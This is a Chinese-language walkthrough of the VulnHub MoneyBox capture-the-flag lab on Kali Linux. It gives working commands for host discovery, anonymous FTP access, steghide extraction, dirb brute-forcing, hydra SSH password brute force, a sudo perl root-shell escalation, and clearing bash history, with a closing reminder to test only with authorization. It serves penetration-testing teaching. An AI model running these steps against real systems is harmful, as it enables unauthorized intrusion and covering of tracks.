从MoneyBox靶场到实战Kali Linux渗透测试全流程拆解刚接触CTF的新手常会遇到这样的困境下载了一个靶场虚拟机却对着黑屏终端不知所措。VulnHub的MoneyBox正是这样一个典型场景——它模拟了真实环境中常见的配置漏洞和权限问题但缺乏实战经验的人很容易在某个步骤卡住。本文将用2023.2版本的Kali Linux带你完整走通从信息收集到提权的全流程重点解决那些教程里不会提到的坑点。1. 环境准备与网络配置1.1 虚拟机导入注意事项VirtualBox导入MoneyBox时常见两个问题网卡驱动报错如果提示未找到虚拟光盘需手动选择.vmdk文件路径内存分配不足建议给Kali分配至少4GB内存MoneyBox只需1GB即可正确的网络配置应该这样操作# Kali网络设置双网卡模式 适配器1仅主机(Host-only)网络 → 与靶机通信 适配器2NAT → 用于软件更新1.2 靶场IP发现技巧很多新手会卡在找不到靶机IP这一步。推荐组合使用这些命令arp-scan -l --interfaceeth0 # 快速扫描同网段设备 nmap -sn 192.168.56.0/24 # 确认存活主机 netdiscover -i eth0 -r 192.168.56.0/24 # 可视化显示注意如果扫描无结果检查VirtualBox的Host-only网络是否启用DHCP2. 信息收集与漏洞初探2.1 端口扫描的进阶用法常规的nmap -sV可能遗漏关键信息建议配合nmap -sC -sV -p- -T4 192.168.56.103 -oA full_scan # 全端口扫描脚本检测扫描结果通常会显示21端口vsftpd 3.0.3可能存在匿名登录22端口OpenSSH 7.9p1需检查版本漏洞80端口Apache 2.4.382.2 FTP匿名登录实战当发现允许匿名登录时别急着下载文件ftp 192.168.56.103 Name: anonymous Password: (直接回车)关键操作步骤ls -la查看隐藏文件binary设置二进制传输模式避免图片损坏mget *下载全部文件3. 隐写术分析与密码破解3.1 图片隐写处理流程使用steghide处理下载的图片时steghide info box.jpg # 检查嵌入文件 steghide extract -sf box.jpg # 提取内容常见问题如果提示密码错误尝试这些常见密码空密码图片文件名如box靶场名称moneybox3.2 Web目录爆破技巧当Web页面看似正常时使用dirb高效爆破dirb http://192.168.56.103 /usr/share/wordlists/dirb/common.txt -X .php,.txt重点关注/blogs/ 目录/admin/ 后台/backup/ 备份文件4. SSH爆破与权限提升4.1 精细化SSH爆破使用hydra爆破时要注意速率控制hydra -l renu -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.56.103关键参数说明-t 4限制线程数避免被ban-vV显示详细过程-o result.txt保存结果4.2 权限提升的三种路径在获取低权限shell后系统检查顺序应该是sudo -l查看可执行命令find / -perm -4000 2/dev/null找SUID文件uname -a检查内核漏洞MoneyBox中可利用的perl脚本提权sudo /usr/bin/perl -e exec /bin/sh;5. Flag收集与痕迹清理5.1 系统化搜索Flag不要只找显眼的flag.txt这些位置也常隐藏flagfind / -name *flag* -type f 2/dev/null grep -r flag{ /home 2/dev/null strings /usr/bin/suspicious_file | grep flag{5.2 渗透测试后的必要操作测试完成后应当删除创建的临时用户清除bash历史记录恢复修改过的配置文件关闭建立的反弹shell最后提醒所有渗透测试必须在授权环境下进行建议使用VirtualBox的快照功能保存初始状态方便反复练习。遇到卡壳时多思考各个服务之间的关联性——比如FTP下载的图片密码可能用在SSH登录Web页面注释可能提示系统用户名。保持这种线索串联思维才是CTF比赛的精髓所在。